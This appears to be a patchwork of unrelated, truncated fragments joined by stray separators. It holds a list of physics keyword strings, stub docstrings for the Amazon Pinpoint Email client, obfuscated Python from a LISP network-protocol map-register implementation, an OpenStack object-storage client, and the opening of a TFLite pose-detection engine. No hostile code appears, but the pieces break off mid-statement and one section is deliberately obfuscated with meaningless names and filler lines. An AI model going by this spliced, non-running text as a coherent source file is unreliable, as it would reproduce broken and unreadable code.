u"partial wave analysis: multipole",
u"ALEPH",
u"B/s: leptonic decay",
u"longitudinal",
u"U-duality",
u"meson: width",
u"nuclear physics: effect",
u"measure",
u"quarkonium: width",
u"squark: pair production",
u"positron: energy spectrum",
u"p: pair production",
u"photon: resolved",
u"correlation: long-range",
u"xenon",
u"F-term",
u"symmetry: transformation",
u"kinematics: phase space",
u"equivalence principle: violation",
u"gravitational radiation: spectrum",
u"mass spectrum: missing-mass",
u"backscatter: laser",
u"measurement theory",
u"gravitino: LSP",
u"diffraction: dissociation",
u"Lifshitz",
u"interference: effect",
u"Hartree-Fock approximation",
u"Kaehler",
u"luminosity: high",
u"anti-p",
u"coalescence",
u"hydrodynamics: viscosity",
u"graviton: propagator",
u"phase space: Fock space",
u"particle: interaction",
u"hardware",
u"showers: electromagnetic",
u"lithium",
u"spin: parity",
u"lepton number",
u"cross section: transverse",
u"horizon: geometry",
u"quark: density",
u"dijet",
u"scaling: geometrical",
u"symmetry breaking: conformal",
u"D: hadronic decay",
u"Klein-Gordon equation: solution",
u"fluid: viscosity",
u"Hall effect: fractional",
u"isospin: asymmetry",
u"particle: model",
u"nucleon nucleon: potential",
u"transverse momentum: dependence",
u"chargino: mass",
u"photon photon: fusion",
u"cylinder",
u"transformation: canonical",
u"form factor: scalar",
u"linear collider",
u"gravitation: tensor",
u"Fourier transformation",
u"channel cross section: upper limit",
u"cross section: hadronic",
u"mass formula",
u"Higgs particle: heavy",
u"electroweak interaction: precision measurement",
u"Dyson-Schwinger equation: solution",
u"baryon resonance",
u"gaugino: condensation",
u"structure function: moment",
u"p-brane: 7",
u"particle: Dirac",
u"direct detection",
u"showers: parton",
u"quantum electrodynamics: correction",
u"string: compactification",
u"T-parity",
u"supersymmetry: parameter space",
u"capture",
u"parton: scattering",
u"messenger",
u"topological insulator",
u"scattering amplitude: forward scattering",
u"matter: accretion",
u"fermion: mass generation",
u"bottom: particle identification",
u"collinear",
u"flavor: SU(3)",
u"sparticle: decay modes",
u"correction",
u"D: pair production",
u"Upsilon(9460)",
u"up",
u"decay constant",
u"gauge boson: hadroproduction",
u"quark: star",
u"black hole: primordial",
u"perturbation: adiabatic",
u"affine",
u"potential: flat direction",
u"quark: mass: twist",
u"B/s0: branching ratio",
u"cumulant | |
object includes the tokens that you use to create the CNAME records that are required to complete the DKIM verification process.
- **SigningEnabled** *(boolean) --*
If the value is ``true`` , then the messages that Amazon Pinpoint sends from the identity are DKIM-signed. If the value is ``false`` , then the messages that Amazon Pinpoint sends from the identity aren't DKIM-signed.
- **Status** *(string) --*
Describes whether or not Amazon Pinpoint has successfully located the DKIM records in the DNS records for the domain. The status can be one of the following:
* ``PENDING`` – Amazon Pinpoint hasn't yet located the DKIM records in the DNS configuration for the domain, but will continue to attempt to locate them.
* ``SUCCESS`` – Amazon Pinpoint located the DKIM records in the DNS configuration for the domain and determined that they're correct. Amazon Pinpoint can now send DKIM-signed email from the identity.
* ``FAILED`` – Amazon Pinpoint was unable to locate the DKIM records in the DNS settings for the domain, and won't continue to search for them.
* ``TEMPORARY_FAILURE`` – A temporary issue occurred, which prevented Amazon Pinpoint from determining the DKIM status for the domain.
* ``NOT_STARTED`` – Amazon Pinpoint hasn't yet started searching for the DKIM records in the DKIM records for the domain.
- **Tokens** *(list) --*
A set of unique strings that you use to create a set of CNAME records that you add to the DNS configuration for your domain. When Amazon Pinpoint detects these records in the DNS configuration for your domain, the DKIM authentication process is complete. Amazon Pinpoint usually detects these records within about 72 hours of adding them to the DNS configuration for your domain.
- *(string) --*
- **MailFromAttributes** *(dict) --*
An object that contains information about the Mail-From attributes for the email identity.
- **MailFromDomain** *(string) --*
The name of a domain that an email identity uses as a custom MAIL FROM domain.
- **MailFromDomainStatus** *(string) --*
The status of the MAIL FROM domain. This status can have the following values:
* ``PENDING`` – Amazon Pinpoint hasn't started searching for the MX record yet.
* ``SUCCESS`` – Amazon Pinpoint detected the required MX record for the MAIL FROM domain.
* ``FAILED`` – Amazon Pinpoint can't find the required MX record, or the record no longer exists.
* ``TEMPORARY_FAILURE`` – A temporary issue occurred, which prevented Amazon Pinpoint from determining the status of the MAIL FROM domain.
- **BehaviorOnMxFailure** *(string) --*
The action that Amazon Pinpoint to takes if it can't read the required MX record for a custom MAIL FROM domain. When you set this value to ``UseDefaultValue`` , Amazon Pinpoint uses *amazonses.com* as the MAIL FROM domain. When you set this value to ``RejectMessage`` , Amazon Pinpoint returns a ``MailFromDomainNotVerified`` error, and doesn't attempt to deliver the email.
These behaviors are taken when the custom MAIL FROM domain configuration is in the ``Pending`` , ``Failed`` , and ``TemporaryFailure`` states.
:type EmailIdentity: string
:param EmailIdentity: **[REQUIRED]**
The email identity that you want to retrieve details for.
:rtype: dict
:returns:
"""
pass
def get_paginator(self, operation_name: str = None) -> Paginator:
"""
Create a paginator for an operation.
:type operation_name: string
:param operation_name: The operation name. This is the same name
as the method name on the client. For example, if the
method name is ``create_foo``, and you\'d normally invoke the
operation as ``client.create_foo(**kwargs)``, if the
``create_foo`` operation can be paginated, you can use the
call ``client.get_paginator(\"create_foo\")``.
:raise OperationNotPageableError: Raised if the operation is not
pageable. You can use the ``client.can_paginate`` method to
check if an operation is pageable.
:rtype: L{botocore.paginate.Paginator}
:return: A paginator object.
"""
pass
def get_waiter(self, waiter_name: str = None) -> Waiter:
"""
Returns an object that can wait for some condition.
:type waiter_name: str
:param waiter_name: The name of the waiter to get. See the waiters
section of the service docs for a list of available waiters.
:returns: The specified waiter object.
:rtype: botocore.waiter.Waiter
"""
pass
def list_configuration_sets(self, NextToken: str = None, PageSize: int = None) -> Dict:
"""
List all of the configuration sets associated with your Amazon Pinpoint account in the current region.
In Amazon Pinpoint, *configuration sets* are groups of rules that you can apply to the emails you send. You apply a configuration set to an email by including a reference to the configuration set in the headers of the email. When you apply a configuration set to an email, all of the rules in that configuration set are applied to the email.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/pinpoint-email-2018-07-26/ListConfigurationSets>`_
**Request Syntax**
::
response = client.list_configuration_sets(
NextToken='string',
PageSize=123
)
**Response Syntax**
::
{
'ConfigurationSets': [
'string',
],
'NextToken': 'string'
}
**Response Structure**
- *(dict) --*
A list of configuration sets in your Amazon Pinpoint account in the current AWS Region.
- **ConfigurationSets** *(list) --*
An array that contains all of the configuration sets in your Amazon Pinpoint account in the current AWS Region.
- *(string) --*
The name of a configuration set.
In Amazon Pinpoint, *configuration sets* are groups of rules that you can apply to the emails you send. You apply a configuration set to an email by including a reference to the configuration set in the headers of the email. When you apply a configuration set to an email, all of the rules in that configuration set are applied to the email.
- **NextToken** *(string) --*
A token that indicates that there are additional configuration sets to list. To view additional configuration sets, issue another request to ``ListConfigurationSets`` , and pass this token in the ``NextToken`` parameter.
:type NextToken: string
:param NextToken:
A token returned from a previous call to ``ListConfigurationSets`` to indicate the position in the list of configuration sets.
:type PageSize: integer
:param PageSize:
The number of results to show in a single call to ``ListConfigurationSets`` . If the number of results is larger than the number you specified in this parameter, then the response includes a ``NextToken`` element, which you can use to obtain additional results.
:rtype: dict
:returns:
"""
pass
def list_dedicated_ip_pools(self, NextToken: str = None, PageSize: int = None) -> Dict:
"""
List all of the dedicated IP pools that exist in your Amazon Pinpoint account in the current AWS Region.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/pinpoint-email-2018-07-26/ListDedicatedIpPools>`_
**Request Syntax**
::
response = client.list_dedicated_ip_pools(
NextToken='string',
PageSize=123
)
**Response Syntax**
::
{
'DedicatedIpPools': [
'string',
],
'NextToken': 'string'
}
**Response Structure**
- *(dict) --*
A list of dedicated IP pools.
- **DedicatedIpPools** *(list) --*
A list of all of the dedicated IP pools that are associated with your Amazon Pinpoint account.
- *(string) --*
The name of a dedicated IP pool.
- **NextToken** *(string) --*
A token that indicates that there are additional IP pools to list. To view additional IP pools, issue another request to ``ListDedicatedIpPools`` , passing this token in the ``NextToken`` parameter.
:type NextToken: string
:param NextToken:
A token returned from a previous call to ``ListDedicatedIpPools`` to indicate the position in the list of dedicated IP pools.
:type PageSize: integer
:param PageSize:
The number of results to show in a single call to ``ListDedicatedIpPools`` . If the number of results is larger than the number you specified in this parameter, then the response includes a ``NextToken`` element, which you can use to obtain additional results.
:rtype: dict
:returns:
"""
pass
def list_deliverability_test_reports(self, NextToken: str = None, PageSize: int = None) -> Dict:
"""
Show a list of the predictive inbox placement tests that you've performed, regardless of their statuses. For predictive inbox placement tests that are complete, | |
if 32 - 32: Ii1I * oO0o
if 85 - 85: i11iIiiIii . OoO0O00 + OoO0O00
if 28 - 28: Oo0Ooo
if 62 - 62: Oo0Ooo + OoooooooOO / iII111i
if 60 - 60: Ii1I / OoOoOO00 . I11i % OOooOOo
if 61 - 61: O0 . Ii1I . O0 * i11iIiiIii * II111iiii / I1Ii111
if 69 - 69: I11i
if 17 - 17: I11i
if 38 - 38: I1Ii111 % OOooOOo
if 9 - 9: O0 . iIii1I11I1II1
if 44 - 44: I1ii11iIi11i % IiII
if 6 - 6: OoO0O00
if 82 - 82: iIii1I11I1II1 . I11i / IiII / OOooOOo * II111iiii % oO0o
if 62 - 62: II111iiii
if 96 - 96: I11i % OoOoOO00 * I1ii11iIi11i
if 94 - 94: Oo0Ooo - i1IIi . O0 % Oo0Ooo . ooOoO0o
if 63 - 63: i11iIiiIii % I1ii11iIi11i % I1IiiI . IiII * o0oOOo0O0Ooo + OOooOOo
if 77 - 77: o0oOOo0O0Ooo
if 63 - 63: ooOoO0o * oO0o + ooOoO0o * Ii1I + Oo0Ooo / I1ii11iIi11i
if 15 - 15: O0 . I1ii11iIi11i * I1ii11iIi11i
if 65 - 65: I1Ii111 + O0 % o0oOOo0O0Ooo
if 72 - 72: OOooOOo . OoOoOO00 / II111iiii
if 69 - 69: OOooOOo * II111iiii - ooOoO0o - i1IIi + i11iIiiIii
if 50 - 50: OoooooooOO * i1IIi / oO0o
if 83 - 83: i1IIi
if 38 - 38: OoooooooOO * iIii1I11I1II1
if 54 - 54: OoooooooOO . I1Ii111
if 71 - 71: Ii1I
if 31 - 31: I11i . i11iIiiIii . OoO0O00 * Oo0Ooo % Ii1I . o0oOOo0O0Ooo
if 92 - 92: OoooooooOO / O0 * i1IIi + iIii1I11I1II1
if 93 - 93: ooOoO0o % I1Ii111
if 46 - 46: I1ii11iIi11i * OoOoOO00 * IiII * I1ii11iIi11i . I1ii11iIi11i
if 43 - 43: ooOoO0o . i1IIi
if 68 - 68: IiII % Oo0Ooo . O0 - OoOoOO00 + I1ii11iIi11i . i11iIiiIii
if 45 - 45: I1IiiI
if 17 - 17: OoooooooOO - ooOoO0o + Ii1I . OoooooooOO % Oo0Ooo
if 92 - 92: I1Ii111 - OOooOOo % OoO0O00 - o0oOOo0O0Ooo % i1IIi
if 38 - 38: I1ii11iIi11i . I11i / OoOoOO00 % I11i
if 10 - 10: O0 . I1IiiI * o0oOOo0O0Ooo / iII111i
class lisp_map_register ( ) :
def __init__ ( self ) :
self . proxy_reply_requested = False
self . lisp_sec_present = False
self . xtr_id_present = False
self . map_notify_requested = False
self . mobile_node = False
self . merge_register_requested = False
self . use_ttl_for_timeout = False
self . map_register_refresh = False
self . record_count = 0
self . nonce = 0
self . alg_id = 0
self . key_id = 0
self . auth_len = 0
self . auth_data = 0
self . xtr_id = 0
self . site_id = 0
self . record_count = 0
self . sport = 0
self . encrypt_bit = 0
self . encryption_key_id = None
if 61 - 61: Oo0Ooo - I1Ii111
if 51 - 51: iII111i * ooOoO0o / O0 / O0
def print_map_register ( self ) :
oooOOOO0oOo = lisp_hex_string ( self . xtr_id )
if 26 - 26: II111iiii + i1IIi
oOOo0ooO0 = ( "{} -> flags: {}{}{}{}{}{}{}{}{}, record-count: " +
"{}, nonce: 0x{}, key/alg-id: {}/{}{}, auth-len: {}, xtr-id: " +
"0x{}, site-id: {}" )
if 14 - 14: iIii1I11I1II1 - ooOoO0o + oO0o + i11iIiiIii / iIii1I11I1II1
lprint ( oOOo0ooO0 . format ( bold ( "Map-Register" , False ) , "P" if self . proxy_reply_requested else "p" ,
# i11iIiiIii . O0 / OOooOOo * i1IIi
"S" if self . lisp_sec_present else "s" ,
"I" if self . xtr_id_present else "i" ,
"T" if self . use_ttl_for_timeout else "t" ,
"R" if self . merge_register_requested else "r" ,
"M" if self . mobile_node else "m" ,
"N" if self . map_notify_requested else "n" ,
"F" if self . map_register_refresh else "f" ,
"E" if self . encrypt_bit else "e" ,
self . record_count , lisp_hex_string ( self . nonce ) , self . key_id ,
self . alg_id , " (sha1)" if ( self . key_id == LISP_SHA_1_96_ALG_ID ) else ( " (sha2)" if ( self . key_id == LISP_SHA_256_128_ALG_ID ) else "" ) , self . auth_len , oooOOOO0oOo , self . site_id ) )
if 14 - 14: IiII + IiII . I11i / Ii1I . iIii1I11I1II1
if 10 - 10: II111iiii . OOooOOo / iII111i
if 35 - 35: iII111i / Oo0Ooo + O0 * iIii1I11I1II1 - O0
if 3 - 3: I1ii11iIi11i
def encode ( self ) :
ooo0OOoo = ( LISP_MAP_REGISTER << 28 ) | self . record_count
if ( self . proxy_reply_requested ) : ooo0OOoo |= 0x08000000
if ( self . lisp_sec_present ) : ooo0OOoo |= 0x04000000
if ( self . xtr_id_present ) : ooo0OOoo |= 0x02000000
if ( self . map_register_refresh ) : ooo0OOoo |= 0x1000
if ( self . use_ttl_for_timeout ) : ooo0OOoo |= 0x800
if ( self . merge_register_requested ) : ooo0OOoo |= 0x400
if ( self . mobile_node ) : ooo0OOoo |= 0x200
if ( self . map_notify_requested ) : ooo0OOoo |= 0x100
if ( self . encryption_key_id != None ) :
ooo0OOoo |= 0x2000
ooo0OOoo |= self . encryption_key_id << 14
if 42 - 42: I11i % Oo0Ooo + IiII - I11i . iIii1I11I1II1 - Ii1I
if 27 - 27: iII111i % Oo0Ooo . I1ii11iIi11i . i1IIi % OoOoOO00 . o0oOOo0O0Ooo
if 37 - 37: iII111i + I1Ii111 * Ii1I + IiII
if 39 - 39: O0 * Oo0Ooo - I1IiiI + Ii1I / II111iiii
if 66 - 66: ooOoO0o + oO0o % OoooooooOO
if ( self . alg_id == LISP_NONE_ALG_ID ) :
self . auth_len = 0
else :
if ( self . alg_id == LISP_SHA_1_96_ALG_ID ) :
self . auth_len = LISP_SHA1_160_AUTH_DATA_LEN
if 23 - 23: oO0o . OoOoOO00 + iIii1I11I1II1
if ( self . alg_id == LISP_SHA_256_128_ALG_ID ) :
self . auth_len = LISP_SHA2_256_AUTH_DATA_LEN
if 17 - 17: IiII
if 12 - 12: i1IIi . OoO0O00
if 14 - 14: OOooOOo + II111iiii % OOooOOo . oO0o * ooOoO0o
IIii1i = struct . pack ( "I" , socket . htonl ( ooo0OOoo ) )
IIii1i += struct . pack ( "QBBH" , self . nonce , self . key_id , self . alg_id ,
socket . htons ( self . auth_len ) )
if 54 - 54: ooOoO0o * I11i - I1Ii111
IIii1i = self . zero_auth ( IIii1i )
return ( IIii1i )
if 15 - 15: iII111i / O0
if 61 - 61: i1IIi / i1IIi + ooOoO0o . I1Ii111 * ooOoO0o
def zero_auth ( self , packet ) :
OoO00oo00 = struct . calcsize ( "I" ) + struct . calcsize ( "QHH" )
iIi11i = ""
IIII1II11Iii = 0
if ( self . alg_id == LISP_NONE_ALG_ID ) : return ( packet )
if ( self . alg_id == LISP_SHA_1_96_ALG_ID ) :
iIi11i = struct . pack ( "QQI" , 0 , 0 , 0 )
IIII1II11Iii = struct . calcsize ( "QQI" )
if 46 - 46: Ii1I * Ii1I / oO0o * I1Ii111
if ( self . alg_id == LISP_SHA_256_128_ALG_ID ) :
iIi11i = struct . pack ( "QQQQ" , 0 , 0 , 0 , 0 )
IIII1II11Iii = struct . calcsize ( "QQQQ" )
if 37 - 37: OoOoOO00 + IiII
packet = packet [ 0 : OoO00oo00 ] + iIi11i + packet [ OoO00oo00 + IIII1II11Iii : : ]
return ( packet )
if 40 - 40: o0oOOo0O0Ooo - O0 * II111iiii / I1IiiI . o0oOOo0O0Ooo + I1Ii111
if 58 - 58: I1Ii111 * O0 / Ii1I + I1IiiI - I1ii11iIi11i * Oo0Ooo
def encode_auth ( self , packet ) :
OoO00oo00 = struct . calcsize ( "I" ) + struct . calcsize ( "QHH" )
| |
is not None:
etag = utils.get_checksum(content)
if etag:
headers["ETag"] = etag
if not headers.get("Content-Type"):
headers["Content-Type"] = None
uri = "/%s/%s" % (self.uri_base, obj_name)
resp, resp_body = self.api.method_put(uri, data=content,
headers=headers)
@_handle_object_not_found
def fetch(self, obj, include_meta=False, chunk_size=None, size=None,
extra_info=None):
"""
Fetches the object from storage.
If 'include_meta' is False, only the bytes representing the
stored object are returned.
Note: if 'chunk_size' is defined, the 'include_meta' parameter is
ignored.
If 'size' is specified, only the first 'size' bytes of the object will
be returned. If the object if smaller than 'size', the entire object is
returned.
When 'include_meta' is True, what is returned from this method is a
2-tuple:
Element 0: a dictionary containing metadata about the file.
Element 1: a stream of bytes representing the object's contents.
The 'extra_info' parameter is included for backwards compatibility. It
is no longer used at all, and will not be modified with swiftclient
info, since swiftclient is not used any more.
"""
uri = "/%s/%s" % (self.uri_base, utils.get_name(obj))
if chunk_size:
# Need the total size of the object
if not isinstance(obj, StorageObject):
obj = self.get(obj)
obj_size = obj.total_bytes
return self._fetch_chunker(uri, chunk_size, size, obj_size)
headers = {}
if size:
headers = {"Range": "bytes=0-%s" % size}
resp, resp_body = self.api.method_get(uri, headers=headers,
raw_content=True)
if include_meta:
meta_resp, meta_body = self.api.method_head(uri)
return (meta_resp.headers, resp_body)
return resp_body
def _fetch_chunker(self, uri, chunk_size, size, obj_size):
"""
Returns a generator that returns an object in chunks.
"""
pos = 0
total_bytes = 0
size = size or obj_size
max_size = min(size, obj_size)
while True:
endpos = min(obj_size, pos + chunk_size - 1)
headers = {"Range": "bytes=%s-%s" % (pos, endpos)}
resp, resp_body = self.api.method_get(uri, headers=headers,
raw_content=True)
pos = endpos + 1
if not resp_body:
# End of file
return
yield resp_body
total_bytes += len(resp_body)
if total_bytes >= max_size:
return
def fetch_partial(self, obj, size):
"""
Returns the first 'size' bytes of an object. If the object is smaller
than the specified 'size' value, the entire object is returned.
"""
return self.fetch(obj, size=size)
@_handle_object_not_found
def delete(self, obj):
"""
Deletes the object if it exists; raises NoSuchObject exception if it
does not exist.
"""
return super(StorageObjectManager, self).delete(obj)
def delete_all_objects(self, nms, asynchronous=False):
"""
Deletes all objects from this container.
By default the call will block until all objects have been deleted. By
passing True for the 'asynchronous' parameter, this method will not block, and
instead return an object that can be used to follow the progress of the
deletion. When deletion is complete the bulk deletion object's
'results' attribute will be populated with the information returned
from the API call. In synchronous mode this is the value that is
returned when the call completes. It is a dictionary with the following
keys:
deleted - the number of objects deleted
not_found - the number of objects not found
status - the HTTP return status code. '200 OK' indicates success
errors - a list of any errors returned by the bulk delete call
"""
if nms is None:
nms = self.api.list_object_names(self.name, full_listing=True)
return self.api.bulk_delete(self.name, nms, asynchronous=asynchronous)
@_handle_object_not_found
def download(self, obj, directory, structure=True):
"""
Fetches the object from storage, and writes it to the specified
directory. The directory must exist before calling this method.
If the object name represents a nested folder structure, such as
"foo/bar/baz.txt", that folder structure will be created in the target
directory by default. If you do not want the nested folders to be
created, pass `structure=False` in the parameters.
"""
if not os.path.isdir(directory):
raise exc.FolderNotFound("The directory '%s' does not exist." %
directory)
obj_name = utils.get_name(obj)
path, fname = os.path.split(obj_name)
if structure:
fullpath = os.path.join(directory, path)
if not os.path.exists(fullpath):
os.makedirs(fullpath)
target = os.path.join(fullpath, fname)
else:
target = os.path.join(directory, fname)
with open(target, "wb") as dl:
content = self.fetch(obj)
try:
dl.write(content)
except UnicodeEncodeError:
encoding = pyrax.get_encoding()
dl.write(content.encode(encoding))
@_handle_object_not_found
def purge(self, obj, email_addresses=None):
"""
Removes a CDN-enabled object from public access before the TTL expires.
Please note that there is a limit (at this time) of 25 such requests;
if you need to purge more than that, you must contact support.
If one or more email_addresses are included, an email confirming the
purge is sent to each address.
"""
cname = utils.get_name(self.container)
oname = utils.get_name(obj)
headers = {}
if email_addresses:
email_addresses = utils.coerce_to_list(email_addresses)
headers["X-Purge-Email"] = ", ".join(email_addresses)
uri = "/%s/%s" % (cname, oname)
resp, resp_body = self.api.cdn_request(uri, method="DELETE",
headers=headers)
@_handle_object_not_found
def get_metadata(self, obj, prefix=None):
"""
Returns the metadata for the specified object as a dict.
"""
uri = "/%s/%s" % (self.uri_base, utils.get_name(obj))
resp, resp_body = self.api.method_head(uri)
ret = {}
# Add the metadata prefix, if needed.
if prefix is None:
prefix = OBJECT_META_PREFIX
low_prefix = prefix.lower()
for hkey, hval in list(resp.headers.items()):
lowkey = hkey.lower()
if lowkey.startswith(low_prefix):
cleaned = hkey.replace(low_prefix, "").replace("-", "_")
ret[cleaned] = hval
return ret
@_handle_object_not_found
def set_metadata(self, obj, metadata, clear=False, prefix=None):
"""
Accepts a dictionary of metadata key/value pairs and updates the
specified object metadata with them.
If 'clear' is True, any existing metadata is deleted and only the
passed metadata is retained. Otherwise, the values passed here update
the object's metadata.
By default, the standard object metadata prefix ('X-Object-Meta-') is
prepended to the header name if it isn't present. For non-standard
headers, you must include a non-None prefix, such as an empty string.
"""
# Add the metadata prefix, if needed.
if prefix is None:
prefix = OBJECT_META_PREFIX
massaged = _massage_metakeys(metadata, prefix)
cname = utils.get_name(self.container)
oname = utils.get_name(obj)
new_meta = {}
# Note that the API for object POST is the opposite of that for
# container POST: for objects, all current metadata is deleted,
# whereas for containers you need to set the values to an empty
# string to delete them.
if not clear:
obj_meta = self.get_metadata(obj, prefix=prefix)
new_meta = _massage_metakeys(obj_meta, prefix)
utils.case_insensitive_update(new_meta, massaged)
# Remove any empty values, since the object metadata API will
# store them.
to_pop = []
for key, val in six.iteritems(new_meta):
if not val:
to_pop.append(key)
for key in to_pop:
new_meta.pop(key)
uri = "/%s/%s" % (cname, oname)
resp, resp_body = self.api.method_post(uri, headers=new_meta)
@_handle_object_not_found
def remove_metadata_key(self, obj, key):
"""
Removes the specified key from the object's metadata. If the key does
not exist in the metadata, nothing is done.
"""
meta_dict = {key: ""}
return self.set_metadata(obj, meta_dict)
class StorageClient(BaseClient):
"""
This is the primary class for interacting with OpenStack Object Storage.
"""
name = "Object Storage"
# Folder upload status dict. Each upload will generate its own UUID key.
# The app can use that key query the status of the upload. This dict
# will also be used to hold the flag to interrupt uploads in progress.
folder_upload_status = {}
# Interval in seconds between checks for completion of bulk deletes.
bulk_delete_interval = 1
def __init__(self, *args, **kwargs):
# Constants used in metadata headers
super(StorageClient, self).__init__(*args, **kwargs)
self._sync_summary = {"total": 0,
"uploaded": 0,
"ignored": 0,
"older": 0,
"duplicate": 0,
"failed": 0,
"failure_reasons": [],
"deleted": 0,
}
self._cached_temp_url_key = None
self.cdn_management_url = ""
self.method_dict = {
"HEAD": self.method_head,
"GET": self.method_get,
"POST": self.method_post,
"PUT": self.method_put,
"DELETE": self.method_delete,
"PATCH": self.method_patch,
}
# Configure CDN, if available
self._configure_cdn()
# Alias old method names to new versions for backwards compatibility.
self._backwards_aliases()
def _configure_cdn(self):
"""
Initialize CDN-related endpoints, if available.
"""
ident = self.identity
cdn_svc = ident.services.get("object_cdn")
if cdn_svc:
ep = cdn_svc.endpoints.get(self.region_name)
if ep:
self.cdn_management_url = ep.public_url
def _backwards_aliases(self):
"""
In order to keep this backwards-compatible with previous versions,
alias the old names to the new methods.
"""
self.list_containers = self.list_container_names
self.get_all_containers = self.list
self.get_container = self.get
self.create_container = self.create
self.delete_container = self.delete
self.get_container_objects = self.list_container_objects
self.get_container_object_names = self.list_container_object_names
self.get_info = self.get_account_info
def get(self, item):
"""
Returns the container whose name is provided as 'item'. If 'item' is
not a string, the original item is returned unchanged.
"""
if isinstance(item, six.string_types):
item = super(StorageClient, self).get(item)
return item
def _configure_manager(self):
"""
Creates a manager to handle interacting with Containers.
"""
self._manager | |
# Copyright 2019 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import numpy as np
from tflite_runtime.interpreter import Interpreter
import time
KEYPOINTS = (
'nose',
'left eye',
'right eye',
'left ear',
'right ear',
'left shoulder',
'right shoulder',
'left elbow',
'right elbow',
'left wrist',
'right wrist',
'left hip',
'right hip',
'left knee',
'right knee',
'left ankle',
'right ankle'
)
KEYPOINTS_DICT = dict(zip(KEYPOINTS, range(len(KEYPOINTS))))
poseChain = (
('nose', 'left eye'),
('left eye', 'left ear'),
('nose', 'right eye'),
('right eye', 'right ear'),
('nose', 'left shoulder'),
('left shoulder', 'left elbow'),
('left elbow', 'left wrist'),
('left shoulder', 'left hip'),
('left hip', 'left knee'),
('left knee', 'left ankle'),
('nose', 'right shoulder'),
('right shoulder', 'right elbow'),
('right elbow', 'right wrist'),
('right shoulder', 'right hip'),
('right hip', 'right knee'),
('right knee', 'right ankle')
)
parentToChildEdges = [KEYPOINTS_DICT[poseChain[i][1]] for i in range(len(poseChain))]
childToParentEdges = [KEYPOINTS_DICT[poseChain[i][0]] for i in range(len(poseChain))]
class Keypoint:
__slots__ = ['k', 'yx', 'score']
def __init__(self, k, yx, score=None):
self.k = k
self.yx = yx
self.score = score
def __repr__(self):
return 'Keypoint(<{}>, {}, {})'.format(self.k, self.yx, self.score)
class Pose:
__slots__ = ['keypoints', 'score']
def __init__(self, keypoints, score=None):
assert len(keypoints) == len(KEYPOINTS)
self.keypoints = keypoints
self.score = score
def __repr__(self):
return 'Pose({}, {})'.format(self.keypoints, self.score)
class PoseEngine:
"""Engine used for pose tasks."""
def __init__(self, model_path, mirror=False,
offsetRefineStep = 2, scoreThreshold = 0.8,
maxPoseDetections = 5, nmsRadius = 30, minPoseConfidence=0.15):
"""Creates a PoseEngine with given model.
Args:
model_path: String, path to TF-Lite Flatbuffer file.
mirror: Flip keypoints horizontally
Raises:
ValueError: An error occurred when model output is invalid.
"""
self.interpreter = Interpreter(model_path)
self.interpreter.allocate_tensors()
self._mirror = mirror
self._input_tensor_shape = self.get_input_tensor_shape()
if (self._input_tensor_shape.size != 4 or
self._input_tensor_shape[3] != 3 or
self._input_tensor_shape[0] != 1):
raise ValueError(
('Image model should have input shape [1, height, width, 3]!'
' This model has {}.'.format(self._input_tensor_shape)))
_, self.image_height, self.image_width, self.image_depth = self.get_input_tensor_shape()
self.heatmaps_nx = self.interpreter.get_output_details()[0]['shape'][2]
self.heatmaps_ny = self.interpreter.get_output_details()[0]['shape'][1]
self.heatmaps_stride_x = self.getStride(self.image_width, self.heatmaps_nx)
self.heatmaps_stride_y = self.getStride(self.image_height, self.heatmaps_ny)
self.quant_heatmaps_r, self.quant_heatmaps_off = self.interpreter.get_output_details()[0]['quantization']
self.quant_offsets_short_r, self.quant_offsets_short_off = self.interpreter.get_output_details()[1]['quantization']
self.quant_offsets_mid_r, self.quant_offsets_mid_off = self.interpreter.get_output_details()[2]['quantization']
self.offsetRefineStep = offsetRefineStep
self.scoreThreshold = scoreThreshold
self.maxPoseDetections = maxPoseDetections
self.nmsRadius = nmsRadius
self.sqRadius = self.nmsRadius*self.nmsRadius
self.minPoseConfidence = minPoseConfidence
# The API returns all the output tensors flattened and concatenated. We
# have to figure out the boundaries from the tensor shapes & sizes.
offset = 0
self._output_offsets = [0]
for size in self.get_all_output_tensors_sizes():
offset += size
self._output_offsets.append(offset)
def getStride(self, l, n):
strides = (8, 16, 32)
return strides[np.argmin(np.abs(strides - l/n))]
def get_input_tensor_shape(self):
return self.interpreter.get_input_details()[0]['shape']
def get_all_output_tensors_sizes(self):
sizes = np.array([], dtype='int32')
for d in self.interpreter.get_output_details():
s = np.squeeze(self.interpreter.get_tensor(d['index'])).flatten().size
sizes = np.append(sizes, int(s))
return sizes
def DetectPosesInImage(self, img):
"""Detects poses in a given image.
For ideal results make sure the image fed to this function is close to the
expected input size - it is the caller's responsibility to resize the
image accordingly.
Args:
img: numpy array containing image
"""
# Extend or crop the input to match the input shape of the network.
if img.shape[0] < self.image_height or img.shape[1] < self.image_width:
img = np.pad(img, [[0, max(0, self.image_height - img.shape[0])],
[0, max(0, self.image_width - img.shape[1])], [0, 0]],
mode='constant')
img = img[0:self.image_height, 0:self.image_width]
assert (img.shape == tuple(self._input_tensor_shape[1:]))
# Run the inference (API expects the data to be flattened)
return self.ParseOutput(self.run_inference(img))
def run_inference(self, img):
if img.shape[0] < self.image_height or img.shape[1] < self.image_width:
img = np.pad(img, [[0, max(0, self.image_height - img.shape[0])],
[0, max(0, self.image_width - img.shape[1])], [0, 0]],
mode='constant')
img = img[0:self.image_height, 0:self.image_width]
assert (img.shape == tuple(self._input_tensor_shape[1:]))
tensor_index = self.interpreter.get_input_details()[0]['index']
input_tensor = self.interpreter.tensor(tensor_index)
input_tensor()[:,:,:,:] = img
start_time = time.monotonic()
self.interpreter.invoke()
elapsed_ms = (time.monotonic() - start_time) * 1000
out = np.empty(0)
for d in self.interpreter.get_output_details():
o = np.squeeze(self.interpreter.get_tensor(d['index'])).flatten()
out = np.append(out, o)
return (elapsed_ms, out)
def logistic(self, x):
return 1/(1+np.exp(-x))
def isPeak(self, heatmaps_flat, index):
maxindex = index // len(KEYPOINTS)
maxkeypoint = index % len(KEYPOINTS)
y_index = maxindex // self.heatmaps_nx
x_index = maxindex % self.heatmaps_nx
y_index_min = np.max((y_index-1, 0))
y_index_max = np.min((y_index+1, self.heatmaps_ny-1))
